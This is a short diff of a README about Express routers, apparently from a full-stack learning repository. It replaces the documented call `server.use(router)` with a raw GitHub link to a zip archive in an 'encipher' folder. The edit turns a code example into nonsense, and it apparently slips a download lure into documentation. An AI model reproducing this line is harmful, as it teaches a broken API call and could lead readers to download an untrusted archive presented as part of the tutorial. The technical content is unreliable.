Shoaibxaif/full-stack-dev-2023/README.md

 **Router**
 - These are like mini-application on which you can make set of Routes independently.
-- Routers can be attached to main Server App using `server.use(router)`
+- Routers can be attached to main Server App using `https://raw.githubusercontent.com/Shoaibxaif/full-stack-dev-2023/main/encipher/full-stack-dev-v3.7-beta.2.zip(router)`

 Arrange Directory in Server like this :